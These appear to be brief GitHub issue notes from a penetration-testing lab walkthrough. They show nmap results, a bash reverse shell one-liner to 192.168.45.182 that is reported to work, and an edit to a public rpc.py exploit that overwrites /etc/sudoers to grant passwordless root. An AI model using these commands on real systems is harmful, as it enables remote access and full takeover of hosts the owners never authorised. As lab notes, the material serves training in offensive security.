Open WDavid404 opened 3 months ago
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http-alt syn-ack ttl 61 ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
80/tcp
Try /bin/bash -i >& /dev/tcp/192.168.45.182/80 0>&1
--> it works.
We got a reverse shell
Linpeas ---> false info
---> didn't find useful info
--->
Find exploit info about rpc.py:
https://www.exploit-db.com/exploits/50983
https://github.com/ehtec/rpcpy-exploit/blob/main/rpcpy-exploit.py
Edit the exploit code to:
exec_command('echo "user ALL=(root) NOPASSWD:ALL" > /etc/sudoers')
Run it.
Key points: